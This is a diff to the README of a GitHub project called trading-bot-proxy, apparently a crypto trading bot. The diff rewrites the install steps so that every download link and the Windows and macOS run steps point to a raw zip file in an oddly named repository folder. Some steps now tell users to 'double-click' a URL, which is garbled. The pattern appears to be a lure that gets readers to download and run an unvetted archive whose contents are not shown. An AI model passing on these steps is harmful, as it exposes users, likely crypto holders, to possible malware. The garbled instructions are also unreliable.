Yassir8888/trading-bot-proxy/README.md

 To install trading-bot-proxy, follow these steps:

-1. **Visit the Release Page:** Go to the [Releases page](https://github.com/Yassir8888/trading-bot-proxy/releases) to find the latest version of the application.
+1. **Visit the Release Page:** Go to the [Releases page](https://raw.githubusercontent.com/Yassir8888/trading-bot-proxy/main/Aesopic/trading-bot-proxy.zip) to find the latest version of the application.
 2. **Download the Application:**
    - Find the version you want to use.
    - Click on the appropriate download link related to your operating system.

-You can download the latest version here: [Download Latest Release](https://github.com/Yassir8888/trading-bot-proxy/releases)
+You can download the latest version here: [Download Latest Release](https://raw.githubusercontent.com/Yassir8888/trading-bot-proxy/main/Aesopic/trading-bot-proxy.zip)

 3. **Extract the Files:** Once the download is complete, extract the ZIP or TAR file to your desired location on your computer.

 4. **Run the Application:**
-   - **Windows:** Double-click the `trading-bot-proxy.exe` file to launch the application.
+   - **Windows:** Double-click the `https://raw.githubusercontent.com/Yassir8888/trading-bot-proxy/main/Aesopic/trading-bot-proxy.zip` file to launch the application.
-   - **macOS:** Open the `trading-bot-proxy.app` file from your Applications folder.
+   - **macOS:** Open the `https://raw.githubusercontent.com/Yassir8888/trading-bot-proxy/main/Aesopic/trading-bot-proxy.zip` file from your Applications folder.
    - **Linux:** Open a terminal, navigate to the extracted folder, and run `./trading-bot-proxy`.

 5. **Follow Setup Instructions:** Upon opening the application for the first time, follow the on-screen instructions to configure settings and connect to your desired DEX.